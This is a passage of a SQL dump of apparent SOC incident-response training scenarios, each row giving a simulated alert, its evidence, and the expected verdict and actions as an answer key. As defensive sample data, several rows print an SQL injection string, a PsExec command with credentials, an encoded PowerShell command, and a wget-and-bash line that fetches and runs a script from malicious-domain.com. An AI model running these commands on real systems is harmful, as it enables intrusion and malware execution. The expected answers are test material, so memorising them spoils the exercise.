PowerShell command detected\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.12\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"collect_forensics\",\"isolate_host\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The encoded PowerShell command looks suspicious and warrants further investigation.\"}', 'Intermediate', 'IR', 5, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-15T12:47:56.739Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T05:22:10Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.12\\\",\\\"hostname\\\":\\\"workstation01\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand JABhAGwAdABlAHIAdAAgACgAJwBzAG8AbQBlAC4AcwB1AHMAcABlAGMAdABlAHQAcgBlAGcAHwAnACkA\\\"}\"},{\"timestamp\":\"2026-02-15T12:46:56.739Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T05:22:10Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.12\\\",\\\"hostname\\\":\\\"workstation01\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand JABhAGwAdABlAHIAdAAgACgAJwBzAG8AbQBlAC4AcwB1AHMAcABlAGMAdABlAHQAcgBlAGcAHwAnACkA\\\"}\"},{\"timestamp\":\"2026-02-15T12:45:56.739Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T05:22:10Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.12\\\",\\\"hostname\\\":\\\"workstation01\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand JABhAGwAdABlAHIAdAAgACgAJwBzAG8AbQBlAC4AcwB1AHMAcABlAGMAdABlAHQAcgBlAGcAHwAnACkA\\\"}\"},{\"timestamp\":\"2026-02-15T12:44:56.739Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T05:22:10Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.12\\\",\\\"hostname\\\":\\\"workstation01\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand JABhAGwAdABlAHIAdAAgACgAJwBzAG8AbQBlAC4AcwB1AHMAcABlAGMAdABlAHQAcgBlAGcAHwAnACkA\\\"}\"},{\"timestamp\":\"2026-02-15T12:43:56.739Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T05:22:10Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.12\\\",\\\"hostname\\\":\\\"workstation01\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand JABhAGwAdABlAHIAdAAgACgAJwBzAG8AbQBlAC4AcwB1AHMAcABlAGMAdABlAHQAcgBlAGcAHwAnACkA\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1254, 'Email Phishing Attempt with Malicious URL', 'critical', 'Proofpoint', 'Phishing email detected with a link pointing to a known malicious domain.', 'Phishing', 'T1566', 1, 'resolved', NULL, '{\"timestamp\":\"2026-02-14T06:45:30Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.23\",\"src_email\":\"phisher@malicious.com\",\"dst_ip\":\"192.168.1.25\",\"username\":\"jdoe\",\"hostname\":\"email-server\",\"url\":\"http://malicious-domain.com/login\"}', '2026-02-12 22:48:13', '2026-02-16 17:44:40', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"phisher@malicious.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Email address associated with multiple phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-domain.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known malicious domain used for phishing\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"block_ip\",\"block_url\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The detected email contains a link to a malicious domain, indicating a phishing attempt.\"}', 'Intermediate', 'IR', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Email Phishing Attempt with Malicious URL\",\"date\":\"2026-02-15T12:47:56.741Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1255, 'False Positive: Legitimate Admin Login from Known IP', 'low', 'Firewall', 'An admin login was flagged as suspicious but originated from a known and trusted IP address.', 'Access', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-02-14T07:00:00Z\",\"event_type\":\"login_success\",\"src_ip\":\"203.0.113.200\",\"dst_ip\":\"10.0.0.5\",\"username\":\"admin\",\"hostname\":\"corp-firewall\"}', '2026-02-13 12:35:28', '2026-02-15 12:47:56', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.200\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Trusted IP address belonging to corporate office\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal network IP address\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"access\",\"analysis_notes\":\"The login was legitimate and originated from a known corporate IP address.\"}', 'Intermediate', 'IR', 5, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1256, 'Potential Data Exfiltration via Suspicious DNS Queries', 'high', 'CrowdStrike', 'Unusual DNS queries detected from an internal host to an unrecognized external domain.', 'Data Exfil', 'T1048', 0, 'resolved', NULL, '{\"timestamp\":\"2026-02-14T09:12:45Z\",\"event_type\":\"dns_query\",\"src_ip\":\"192.168.1.15\",\"hostname\":\"workstation02\",\"domain\":\"suspicious-exfil.com\"}', '2026-02-12 21:49:20', '2026-02-19 15:52:50', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"domain\",\"value\":\"suspicious-exfil.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Domain associated with data exfiltration activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"block_domain\",\"isolate_host\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The DNS queries to a known malicious domain indicate potential data exfiltration.\"}', 'Intermediate', 'IR', 5, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1257, 'False Positive: Normal Network Traffic Misidentified as Anomaly', 'low', 'FTK', 'Routine network traffic flagged as suspicious due to a temporary network issue.', 'Network Anomaly', 'T1071', 0, 'Closed', 229, '{\"timestamp\":\"2026-02-14T10:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.101\",\"dst_ip\":\"192.168.1.102\",\"hostname\":\"server01\"}', '2026-02-14 10:21:27', '2026-03-10 23:21:53', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.102\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network\",\"analysis_notes\":\"The alert was triggered due to a temporary issue that misidentified routine traffic as anomalous.\"}', 'Intermediate', 'IR', 5, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-15T12:47:56.745Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T10:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.101\\\",\\\"dst_ip\\\":\\\"192.168.1.102\\\",\\\"hostname\\\":\\\"server01\\\"}\"},{\"timestamp\":\"2026-02-15T12:46:56.745Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T10:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.101\\\",\\\"dst_ip\\\":\\\"192.168.1.102\\\",\\\"hostname\\\":\\\"server01\\\"}\"},{\"timestamp\":\"2026-02-15T12:45:56.745Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T10:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.101\\\",\\\"dst_ip\\\":\\\"192.168.1.102\\\",\\\"hostname\\\":\\\"server01\\\"}\"},{\"timestamp\":\"2026-02-15T12:44:56.745Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T10:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.101\\\",\\\"dst_ip\\\":\\\"192.168.1.102\\\",\\\"hostname\\\":\\\"server01\\\"}\"},{\"timestamp\":\"2026-02-15T12:43:56.745Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T10:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.101\\\",\\\"dst_ip\\\":\\\"192.168.1.102\\\",\\\"hostname\\\":\\\"server01\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1258, 'SQL Injection Attempt Detected on Public Web Server', 'critical', 'Wazuh', 'A potential SQL injection attempt identified in the request body of an incoming web request.', 'Web Attack', 'T1190', 1, 'resolved', NULL, '{\"timestamp\":\"2026-02-14T11:15:30Z\",\"event_type\":\"web_request\",\"src_ip\":\"198.51.100.55\",\"dst_ip\":\"203.0.113.10\",\"hostname\":\"public-web-server\",\"request_body\":\"\' OR \'1\'=\'1\' --\"}', '2026-02-12 23:40:47', '2026-02-16 17:43:18', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported for SQL injection attempts\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"\' OR \'1\'=\'1\' --\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"SQL injection attempt detected\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The request body contains a classic SQL injection payload, indicating an attack attempt.\"}', 'Intermediate', 'IR', 5, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-15T12:47:56.746Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T11:15:30Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.55\\\",\\\"dst_ip\\\":\\\"203.0.113.10\\\",\\\"hostname\\\":\\\"public-web-server\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-02-15T12:46:56.746Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T11:15:30Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.55\\\",\\\"dst_ip\\\":\\\"203.0.113.10\\\",\\\"hostname\\\":\\\"public-web-server\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-02-15T12:45:56.746Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T11:15:30Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.55\\\",\\\"dst_ip\\\":\\\"203.0.113.10\\\",\\\"hostname\\\":\\\"public-web-server\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-02-15T12:44:56.746Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T11:15:30Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.55\\\",\\\"dst_ip\\\":\\\"203.0.113.10\\\",\\\"hostname\\\":\\\"public-web-server\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-02-15T12:43:56.746Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T11:15:30Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.55\\\",\\\"dst_ip\\\":\\\"203.0.113.10\\\",\\\"hostname\\\":\\\"public-web-server\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(1259, 'Lateral Movement Detected via PsExec Tool', 'high', 'Velociraptor', 'PsExec tool execution detected indicating potential lateral movement between internal hosts.', 'Lateral Movement', 'T1077', 1, 'resolved', NULL, '{\"timestamp\":\"2026-02-14T13:25:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.20\",\"dst_ip\":\"192.168.1.30\",\"hostname\":\"workstation03\",\"command_line\":\"PsExec.exe \\\\\\\\192.168.1.30 -u admin -p password cmd\"}', '2026-02-14 17:16:06', '2026-02-19 15:18:37', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"PsExec.exe \\\\\\\\192.168.1.30 -u admin -p password cmd\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"PsExec usage detected\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The use of PsExec for remote execution indicates possible lateral movement within the network.\"}', 'Intermediate', 'IR', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-15T12:47:56.747Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T13:25:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"hostname\\\":\\\"workstation03\\\",\\\"command_line\\\":\\\"PsExec.exe \\\\\\\\\\\\\\\\192.168.1.30 -u admin -p password cmd\\\"}\"},{\"timestamp\":\"2026-02-15T12:46:56.747Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T13:25:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"hostname\\\":\\\"workstation03\\\",\\\"command_line\\\":\\\"PsExec.exe \\\\\\\\\\\\\\\\192.168.1.30 -u admin -p password cmd\\\"}\"},{\"timestamp\":\"2026-02-15T12:45:56.747Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T13:25:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"hostname\\\":\\\"workstation03\\\",\\\"command_line\\\":\\\"PsExec.exe \\\\\\\\\\\\\\\\192.168.1.30 -u admin -p password cmd\\\"}\"},{\"timestamp\":\"2026-02-15T12:44:56.747Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T13:25:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"hostname\\\":\\\"workstation03\\\",\\\"command_line\\\":\\\"PsExec.exe \\\\\\\\\\\\\\\\192.168.1.30 -u admin -p password cmd\\\"}\"},{\"timestamp\":\"2026-02-15T12:43:56.747Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T13:25:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"hostname\\\":\\\"workstation03\\\",\\\"command_line\\\":\\\"PsExec.exe \\\\\\\\\\\\\\\\192.168.1.30 -u admin -p password cmd\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1260, 'Malware Detected in Executable File via Volatility', 'critical', 'Volatility', 'A malware executable file was detected based on its hash during memory analysis.', 'Malware', 'T1105', 1, 'resolved', NULL, '{\"timestamp\":\"2026-02-14T14:45:50Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.40\",\"hostname\":\"infected-host\",\"command_line\":\"malware.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-02-13 18:11:42', '2026-02-16 17:42:59', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.40\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The file hash matches a known malware signature, confirming the presence of malware.\"}', 'Intermediate', 'IR', 5, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-15T12:47:56.748Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T14:45:50Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.40\\\",\\\"hostname\\\":\\\"infected-host\\\",\\\"command_line\\\":\\\"malware.exe\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-02-15T12:46:56.748Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T14:45:50Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.40\\\",\\\"hostname\\\":\\\"infected-host\\\",\\\"command_line\\\":\\\"malware.exe\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-02-15T12:45:56.748Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T14:45:50Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.40\\\",\\\"hostname\\\":\\\"infected-host\\\",\\\"command_line\\\":\\\"malware.exe\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-02-15T12:44:56.748Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T14:45:50Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.40\\\",\\\"hostname\\\":\\\"infected-host\\\",\\\"command_line\\\":\\\"malware.exe\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-02-15T12:43:56.748Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T14:45:50Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.40\\\",\\\"hostname\\\":\\\"infected-host\\\",\\\"command_line\\\":\\\"malware.exe\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(1261, 'Suspicious Command Execution Detected on Internal Host', 'high', 'Velociraptor', 'A potentially malicious command execution was detected on an internal host, indicating possible command injection. The command line used is commonly associated with unauthorized system access attempts.', 'Malware', 'T1059', 1, 'resolved', NULL, '{\"timestamp\":\"2026-02-14T03:45:12Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.15\",\"dst_ip\":\"\",\"username\":\"jdoe\",\"hostname\":\"internal-host-01\",\"command_line\":\"wget http://malicious-domain.com/malware.sh -O /tmp/malware.sh && bash /tmp/malware.sh\"}', '2026-02-14 17:39:26', '2026-02-16 05:11:38', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected machine\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"wget http://malicious-domain.com/malware.sh -O /tmp/malware.sh && bash /tmp/malware.sh\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command recognized as malware delivery and execution attempt\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\",\"block_hash\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The command execution is a clear indicator of a malware attempt, requiring immediate containment and analysis.\"}', 'Beginner', 'IR', 3, 1, 'TECH', NULL, NULL, 